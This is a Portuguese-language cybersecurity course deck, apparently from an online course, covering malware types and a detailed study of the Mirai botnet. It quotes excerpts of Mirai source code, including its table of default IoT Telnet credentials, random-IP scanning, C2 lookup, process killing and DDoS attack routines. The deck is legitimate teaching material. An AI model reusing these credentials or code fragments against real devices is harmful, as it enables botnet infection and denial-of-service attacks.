• Politicas claras e abrangentes como base para responsabilidade
coletiva.
• Adesão a frameworks e normas (estado da arte):
• ISO 27001, CIS, NIST entre outros.
• Diretrizes para comportamentos e procedimentos seguros:
• Delineamento de comportamentos esperados.
• Procedimentos para notificação de incidentes.
• Cultura organizacional focada em segurança.
Fonte: o Autor
Simulações de Ataque de Phishing
• Simulações de Phishing:
• Avaliação da prontidão dos funcionários e eficiência dos
programas de treinamento.
• Identificação de vulnerabilidades, permite ajustes estratégicos na
defesa.
• Ampla gama de ferramentas de teste (proprietárias e open-source):
• Recursos de software e hardware disponíveis.
• Aprimoramento contínuo.
Blog: Phishing Tools
Fonte: ícone de Freepik.com. Acesso em 06 
de dezembro de 2023
https://phishgrid.com/blog/top-10-best-phishing-tools/
Gestão de Incidentes de Segurança
• Importância de um Plano de Resposta a Incidentes detalhado e 
eficaz para preparação contra incidentes inesperados.
• Personalização e abrangência do plano:
• Evitar abordagens genéricas ("copia e cola").
• Inclusão de protocolos para ataques de Engenharia Social.
• Objetivos do plano: minimizar danos e garantir recuperação ágil e 
eficiente.
• Uma corrida constante, preparação como chave para enfrentar 
desafios.
Fonte: ícone de Freepik.com. Acesso em 06 
de dezembro de 2023
Revisãode Acesso e Privilégios
• Princípio do menor privilégio como estratégia de mitigação.
• Restrição de acesso como tática de segurança. 
• Acesso limitado diminui chances de ataques.
• Adoção do conceito de Zero Trust. Importância de entender e 
explorar esse paradigma.
• Necessidade de abordagem cuidadosa à confiança.
Fonte: ícone de Freepik.com. Acesso em 06 
de dezembro de 2023
Conclusão
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Nesse conteúdo, reconhecemos a importância de permanecer alerta
e preparado.
No próximo tópico, abordaremos os Malwares:
• Exploração de vírus a ransomware.
• Mecânica e métodos de ataque de malwares.
Aula 04
Malwares
Tipos de Malwares
Tipos de malware
Fonte: Malwares em 
<https://as2.ftcdn.net/v2/jpg/04/63/54/27/1000_F_463542729_pTBUhiQcD
cpJiB1O1xgH9kk4rk2lcS5X.jpg> Acesso em 07 de dezembro de 2023
Malware, abreviação de “malicious software”, refere-se a 
qualquer programa projetado para causar danos. 
Várias formas:
1. Vírus: 
2. Worms
3. Trojans
4. Ransomware
5. Bots
Objetivo Comum
• Comprometimento da segurança digital
Fonte: https://br.freepik.com. 
Acesso em 08 de dezembro de 2023
Worm e Trojan
• Worms são ameaças cibernéticas que se destacam pela 
capacidade de auto-replicação e disseminação por redes, 
infectando numerosos sistemas sem necessitar de qualquer 
interação direta com o usuário. 
• Conficker, ILOVEYOU, Nimda
• Trojans são malwares disfarçados de software legítimo, 
enganando os usuários para que os instalem e executem, 
desencadeando assim suas cargas maliciosas. 
• Zeus, DarkComet, Blackshades
Ransomware | Keyloggers
Fonte: o Autor
• Ransomware é uma forma de malware que criptografa os dados 
pessoais do usuário, bloqueando o acesso até que um resgate 
seja pago. 
• Os keyloggers operam discretamente, monitorando e registrando 
cada pressionamento de tecla feito pelo usuário, com o objetivo de 
capturar informações sensíveis como senhas, detalhes de contas 
bancárias e mensagens pessoais. Podemos ter tanto como 
software quanto como hardware
Bots e Botnets
• Individualmente, os bots podem parecer pequenos programas
automatizados com funções específicas, muitas vezes percebidos
como inofensivos.
• Quando agrupados em larga escala, formando botnets, eles se
tornam forças poderosas. Fonte: AdobeStock
Estudando o Mirai
O Mirai destaca-se como um bom caso didático de botnets, ilustrando
vividamente a capacidade dessas redes em orquestrar ataques
DDoS ao explorar vulnerabilidades em dispositivos IoT.
Algumas razões para estuda-lo:
• Aprendizagem e Aprimoramento em Linguagem C e Go.
• Protocolos de Rede (TCP/IP).
• Compreensão das Vulnerabilidades de IoT.
• Insights sobre Botnets e ataques DDoS.
Fonte: AdobeStock
https://github.com/jgamblin/Mirai-Source-Code
https://github.com/jgamblin/Mirai-Source-Code
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Nesse tópico, exploramos diferentes tipos de malwares e suas 
características.
No próximo tópico, desvendaremos o Mirai e investigaremos seu 
funcionamento, estratégias e técnicas.
Mirai-Infecção e Propagaçao
Identificando dispositivos vulneráveis
scanner.c
void scanner_init(void){
...
// Set up passwords
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10);
// root xc3511
add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9);
// root vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8);
// root admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7);
// admin admin
add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6);
// root 888888
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5);
// root xmhdipc
add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5);
// root default
add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5);
// root juantech
...
}
Fonte: AdobeStock
https://github.com/jgamblin/Mirai-Source-Code
O processo de infecção
• Iniciação do scanner:
• O scanner é inicializado > Prepara o ambiente > Monta pacotes raw
> Envia para IPs aleatórios na porta 23 (Telnet) ou outras portas 
comuns.
• Cria combinações de nome de usuário e senha para autenticação.
• O scanner envia pacotes SYN para diferentes endereços IP. 
• Se pacote SYN-ACK é recebido, dispositivo pronto para Brute Force. 
• Tentativas de Brute Force. Máquina de estados controla o processo.
• Se autenticação bem-sucedida, relata a conexão de volta ao controlador.
Fonte: AdobeStock
Estabelecimento da comunicação com o C2
Fonte: AdobeStock
C2
Estabelecimento da comunicação com o C2
main.c
static void resolve_cnc_addr(void)
{ 
struct resolv_entries *entries;
table_unlock_val(TABLE_CNC_DOMAIN);
entries = resolv_lookup(table_retrieve_val(TABLE_CNC_DOMAIN, NULL));
...
...
printf("[main] Received %d bytes from CNC\n", len);
if (len > 0) 
attack_parse(rdbuf, len); 
...
Propagação
• Capacidade de buscar novos alvos após infecção inicial.
• Permite captura de dispositivos vulneráveis automaticamente.
• Recebimento de instruções e adaptabilidade através de C2.
• Capacidade de aumentar alcance rapidamente sem intervenção 
direta.
Fonte: AdobeStock
Natureza autossustentável
scanner.c
// Loop principal que gera e envia pacotes TCP SYN
while (TRUE)
{
...
for (i = 0; i < SCANNER_RAW_PPS; i++)
{
...
iph->daddr = get_random_ip();
...
sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), 
MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
}
...
}
Fonte: AdobeStock
Técnica de Brute Force
• Explora segurança frágil e gestão negligente de credenciais.
• Grande quantidade de dispositivos vulneráveis afetados com 
esforço mínimo.
• Necessidade de trocar senhas padrão por opções mais seguras.
• Maior educação em segurança cibernética urgente.
Fonte: AdobeStock
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Nesse tópico, exploramos o funcionamento técnico:
• Vulnerabilidades em dispositivos. 
• Necessidade de aprimorar práticas de segurança na fabricação e 
uso
No próximo tópico, abordaremos o detalhamento de como o Mirai realiza 
atividades maliciosas.
Mirai-Estrutura e Comunicação
Arquitetura do código do Mirai
• Arquitetura do código do Mirai
• Dividida em duas partes principais: bots e servidor C&C/C2.
• Gestão Eficiente e Operação Robusta
• Estrutura permite administração eficaz dos bots.
• Operação robusta em diversos ambientes de dispositivos IoT.
• Linguagens de Programação Específicas
• Servidor C&C/C2: Go, plataforma confiável para administração.
• Bots: C, otimizados para dispositivos IoT.
• Benefícios da Divisão
• Facilita a organização e manutenção do código.
• Otimiza a execução do botnet em ambientes variados.
Fonte: AdobeStock
https://github.com/jgamblin/Mirai-Source-Code
Componentes chave do código
Fonte: AdobeStock
C&C/C2:
• main.go – ponto de entrada no binário do servidor.
• admin.go - interface de administração.
• clientList.go - lista de bots alocados para um determinado ataque.
• attack.go - responsável por lidar com a solicitação de ataque iniciada 
pelo servidor C&C/C2.
Bot:
• main.c – ponto de entrada na execução do bot.
• scanner.c – varredura de endereços IP em busca de outros dispositivos.
• killer.c - mata vários processos em execução no bot.
• attackudp.c – implementa ataques a serem realizados por um bot IoT.
Componentes chave do código
attack.go
var attackInfoLookup map[string]AttackInfo = map[string]AttackInfo {
...
"udp": AttackInfo {
0,
[]uint8 {2, 3, 4, 0, 1, 5, 6, 7, 25},
"UDP flood",
},
...
}
var flagInfoLookup map[string]FlagInfo = map[string]FlagInfo {
...
"len": FlagInfo {
0,
"Size of packet data, default is 512 bytes",
},
...
}
attackInfoLookup e flagInfoLookup definem os ataques disponíveis e as flags que 
podem ser usadas para configurá-los. Cada tipo de ataque suporta um conjunto 
específico de flags, permitindo personalizaçãodetalhada do ataque.
Fonte: AdobeStock
Componentes chave do código
scanner.c
static void setup_connection(struct scanner_connection *conn)
{
...
if (connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct
sockaddr_in)) == -1)
{
// Se a conexão falhar, fecha o socket e tenta novamente mais tarde
close(conn->fd);
...
}
}
static int consume_any_prompt(struct scanner_connection *conn)
{
...
// Verifica por prompts indicando onde inserir credenciais
if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, "assword", 7) != -1)
{
// Se encontrar um prompt de senha, tenta autenticar
...
}
}
Fonte: AdobeStock
Componentes chave do código
killer.c
// Abre /proc/net/tcp para encontrar processos escutando 
// na porta especificada
// Se encontrar um processo escutando na porta especificada, tenta matá-lo
BOOL killer_kill_by_port(port_t port)
{ 
DIR *dir, *fd_dir; 
struct dirent *entry, *fd_entry; 
...
while (util_fdgets(buffer, 512, fd) != NULL)
{
...
if (util_stristr(exe, util_strlen(exe), inode) != -1) 
{
printf("[killer] Found pid %d for port %d\n", util_atoi(pid, 
10), ntohs(port)); 
kill(util_atoi(pid, 10), 9);
ret = 1; 
}
}
...
}
Fonte: AdobeStock
Comunicação entre Bots e Servidor C2
• Comunicação no Mirai, entre dispositivos infectados e servidor C&C/C2.
• Processo de registro e comunicação
• Dispositivos recém-infectados registram-se no botnet.
• Estabelecem comunicação com C&C para receber instruções.
• Execução de comandos
• Bots executam comandos recebidos do servidor C&C/C2.
• Permite ataques coordenados e propagação do malware.
• Segurança e anonimato
• Comunicação projetada para ser segura e anônima.
• Utiliza técnicas avançadas para evitar detecção.
• Protege contra análise por pesquisadores de segurança e 
autoridades.
Fonte: AdobeStock
Registro na Botnet
• Registro inicial
• Primeiro passo após infecção: registro na botnet.
• Comunicação com o servidor C&C/C2 essencial para integração.
• Integração à rede
• Permite que o dispositivo receba comandos do Mirai.
• Participação ativa nas operações e ataques da botnet.
• Eficiência do processo
• Processo de registro demonstra a sofisticação da botnet.
• Novos dispositivos rapidamente assimilados.
• Contribui para fortalecer e expandir a rede maliciosa.
Fonte: AdobeStock
Distribuição e Execução de Comandos
• Instruções do Servidor C2
• Dispositivos infectados esperam por ordens após registro.
• Instruções variam de ataques a propagação do malware.
• Variedade de comandos
• Desde lançamento de ataques DDoS a busca por novos 
dispositivos para infectar.
• Flexibilidade nas operações do botnet.
Fonte: AdobeStock
Segurança e Anonimato
• Uso de várias técnicas para proteger a rede.
• Emprego de criptografia para segurança das comunicações.
• Técnicas para ocultar a origem dos ataques e a identidade dos 
bots.
Fonte: AdobeStock
Orquestração de Ataques DDoS
• Notoriedade por ataques DDoS em grande escala.
• Coordenação meticulosa.
• Seleção e ataques a alvos específicos. 
• Utilização eficaz dos dispositivos infectados para lançamento de 
ataques.
Fonte: AdobeStock
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Nesse tópico, aprofundamos nosso conhecimento na estrutura e 
operações do Mirai.
No próximo tópico, abordaremos as Técnicas de Ataque:
• Foco nas estratégias de ataque DDoS do Mirai.
• Planejamento e execução de ataques, escolha de alvos.
Mirai-Tecnicas de Ataque
Técnicas de Ataque
void attack_tcp_stomp(uint8_t targs_len, struct attack_target *targs, uint8_t 
opts_len, struct attack_option *opts)
{ 
int i, rfd; 
...
// Set up receive socket
// Criação de Socket RAW: Esse tipo de socket permite ao usuário manipular os 
// pacotes TCP/IP, incluindo cabeçalhos, essencial para criar pacotes maliciosos.
if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) 
{
...
// Ataque que explora servidores DNS, enviando solicitações com o objetivo de 
sobrecarregar o servidor com respostas.
void attack_udp_dns(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, 
struct attack_option *opts)
{ 
int i, fd; 
char **pkts = calloc(targs_len, sizeof (char *));
...
attack_udp.c
attack_tcp.c
Fonte: AdobeStock
Seleção e alternação entre métodos
A capacidade do Mirai de selecionar e alternar entre diferentes
técnicas de ataque é uma característica chave e versátil.
Algumas funções de ataque nomeadas:
• attack_udp_generic: Ataque UDP genérico.
• attack_udp_vse: Ataque UDP amplificado (VSE).
• attack_udp_dns: Ataque UDP a servidores DNS.
• attack_tcp_syn: Ataque TCP SYN flood.
• attack_tcp_stomp: Ataque TCP STOMP.
Fonte: AdobeStock
Seleção de Alvos
Fonte: AdobeStock
Responsável por analisar o comando de ataque e inicializar uma
estrutura Attack com os parâmetros especificados, incluindo os alvos.
func NewAttack(str string, admin int) (*Attack, error) {
... 
// Parse targets 
if len(args) == 0 { 
return nil, errors.New("Must specify prefix/netmask as targets")
....
prefix = cidrInfo[0]
if len(cidrInfo) == 2 {
...
netmask = uint8(netmaskTmp)
...
attack.go
...
// Enfileira o comando de ataque para os bots
clientList.QueueBuf(buf, botCount, "") this.conn.Write([]byte("OK\r\n"))
...
Coordenação do ataque
Após a autenticação, o comando de ataque (parte do comando
recebido após a chave da API) é processado.
Fonte: AdobeStock
... // Processa o comando de ataque após a autenticação 
cmd = passwordSplit[1] ... atk, err := NewAttack(cmd, userInfo.admin)
...
api.go
Uma vez que o comando de ataque é validado e processado, o próximo
passo é distribuí-lo aos bots apropriados para execução através do método
QueueBuf da clientList.go, que enfileira o comando para ser enviado aos
bots.
...
// Enfileira o comando de ataque para os bots
clientList.QueueBuf(buf, botCount, "") this.conn.Write([]byte("OK\r\n"))
...
Distribuição e sobrecarga
• Dispositivos infectados geram tráfego massivo. 
• Cooperação entre bots para sobrecarregar alvos. 
• Comando recebido e processado pela API. 
• Distribuição para bots conectados. 
• Cada bot contribui para o volume total de tráfego. 
Fonte: AdobeStock
Impactos
• Sobrecarga de redes e servidores.
• Comprometimento de dispositivos (IoT).
• Interferência em serviços críticos.
• Amplificação dos ataques.
• Custo financeiro para mitigação e recuperação.
Fonte: AdobeStock
Conclusão
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Nesse conteúdo, abordamos as Ameaças cibernéticas:
• Tipos de ataques cibernéticos.
• Atores de ameaça.
• Framework MITRE ATT&CK.
• Engenharia Social.
• Malwares, com foco especial no Mirai.
• Alguns destaques
• Importância de aprender sobre ameaças como o Mirai.
• Expansão do conhecimento em programação e redes.
• Entendimento aprofundado de tipos de ataques.
• Estratégias de fortalecimento contra ataques.
Recapitulando
Recapitulando
Neste curso, você conheceu os tipos mais comuns de ataques
cibernéticos e quais são os principais atores de ameaças
cibernéticas, suas motivações e alguns estudos de casos
famosos.
Também aprendeu o que é engenharia social, quais as táticas
utilizadas e quais são os tipos de malwares que podem afetar
a vida digital de uma pessoa física ou de uma empresa.
Fonte: Adobe Stock
Referências
Referências
CLARKE, R. A.; KNAKE, R. Cyber War. [S. l.]: HarperCollins, 2010.
PROKISCH, C. A. Segurança digital prevenção e resposta a ataques cibernéticos. São Paulo: Editora Senac, 2023.
ZETTER, K. Countdown to Zero Day Stuxnet and the Launch of the World's First Digital Weapon. [S. l.]: Crown, 2014
MITRE ATT&CK. Site. Disponível em<https://attack.mitre.org/> . Acesso em: 18 mar 2024.
GORDOVER, M. Throwback Thursday: Lessons Learned from the 2008 Heartland Data Breach in PROOFPOINT. 19 mar 
2015. Disponível em: <https://www.proofpoint.com/us/blog/insider-threat-management/throwback-thursday-lessons-
learned-2008-heartland-breach>.Acesso em: 18 mar 2024.
VIJAYAN, J. Sony Pictures falls victim to major data breach in Computerworld. Disponível em: < 
https://www.computerworld.com/article/2508871/sony-pictures-falls-victim-to-major-data-breach.html>. Acesso em: 
18 mar 2024.
Referências
RAHMAN, M. H.; CASSANDRO, R.; WUEST, T.; SHAFAE, M. Taxonomy for Cybersecurity Threat Attributes and
Countermeasures in Smart Manufacturing Systems. Disponível em: 
<https://arxiv.org/ftp/arxiv/papers/2401/2401.01374.pdf>. Acesso em: 18 mar 2024.
VENTURA, F. O maior ataque DDoS já registrado teve como alvo o GitHub in Tecnoblog. Disponível em: 
<https://tecnoblog.net/noticias/maior-ataque-ddos-github/>. Acesso em: 18 mar 2024.
GAMBLIN, J. Mirai Source Code. Disponível em: <https://github.com/jgamblin/Mirai-Source-Code> . Acesso em: 18 mar 
2024.
	Identificar as principais ameaças cibernéticas
	Número do slide 2
	Aula 01
	Número do slide 4
	O que são Ataques Cibernéticos?
	Objetivos
	Tipos mais comuns de ataques
	Importância do tema
	A seguir...
	Número do slide 10
	O que é Phishing
	Como funcionam os ataques de phishing
	Identificando tentativas de phishing
	O que é Engenharia Social
	O que é Engenharia Social
	Prevenção
	A seguir...
	Número do slide 18
	Ataques Man-in-the-Middle (MitM) 
	Como prevenir ataques MitM
	Ataques de Força Bruta (Brute Force)
	Estratégias de Proteção
	A importância do tema
	A seguir...
	Número do slide 25
	Conceitos – DoS e DDsS
	DoS – Denial of Service
	DDoS – Distributed Denial of Service
	Cenários de ataques
	Mecanismo de ataque
	Impacto e Estratégia de mitigação
	O que é Injection
	Exemplos
	Prevenção
	A seguir
	Aula 02
	Hackers
	Black Hat & White Hat
	Atores de ameaça
	MITRE ATT&CK
	MITRE ATT&CK
	A seguir...
	Número do slide 43
	Introdução às Ameaças Persistentes Avançadas (APTs)
	E1 - Reconhecimento
	E2 – Acesso inicial
	E3 – Comando e Controle C2
	E4 – Movimento lateral
	E5 – Exfiltração de dados
	Desafios e Impactos das APTs
	A seguir...
	Número do slide 52
	Introdução ao Ataque APT10 – Stone Panda
	E1 - Reconhecimento
	E2 – Acesso Inicial
	E3 - Comando e Controle | C2
	E4 - Movimento Lateral
	E5 - Exfiltração de Dados
	Conclusão e Defesa contra APTs
	A seguir...
	Número do slide 61
	Ameaças internas
	Estudo de Caso
	Estudo de Caso
	Estudo de Caso
	Técnicas utilizadas
	Monitoramento
	A seguir...
	Aula 03
	Número do slide 70
	Engenharia Social
	Tipos de Engenharia Social
	Métodos de engajamento
	Engajamento & Conscientização
	A seguir...
	Número do slide 76
	Ataque Evil Twin
	Construindo o ataque
	Coleta de Dados
	Refinamento – QRLJacking
	A seguir...
	Número do slide 82
	O que é Baiting
	Exemplos de Baiting
	Baiting & Ducky
	O que é Pretexting
	Aspectos do Pretexting
	Evitando Baiting e Pretexting
	A seguir...
	Número do slide 90
	Educação de Indivíduos
	Ferramentas de Segurança Cibernética
	Políticas de Segurança Fortes
	Simulações de Ataque de Phishing
	Gestão de Incidentes de Segurança
	Revisão de Acesso e Privilégios
	Conclusão
	Aula 04
	Número do slide 99
	Tipos de malware
	Worm e Trojan
	Ransomware | Keyloggers
	Bots e Botnets
	Estudando o Mirai
	A seguir...
	Número do slide 106
	Identificando dispositivos vulneráveis
	O processo de infecção
	Estabelecimento da comunicação com o C2
	Estabelecimento da comunicação com o C2
	Propagação
	Natureza autossustentável
	Técnica de Brute Force
	A seguir...
	Número do slide 115
	Arquitetura do código do Mirai
	Componentes chave do código
	Componentes chave do código
	Componentes chave do código
	Componentes chave do código
	Comunicação entre Bots e Servidor C2
	Registro na Botnet 
	Distribuição e Execução de Comandos
	Segurança e Anonimato
	Orquestração de Ataques DDoS
	A seguir...
	Número do slide 127
	Técnicas de Ataque
	Seleção e alternação entre métodos
	Seleção de Alvos
	Coordenação do ataque
	Distribuição e sobrecarga
	Impactos
	Conclusão
	 
	Recapitulando
	Número do slide 137
	Referências
	Referências
	Número do slide 140

Continue navegando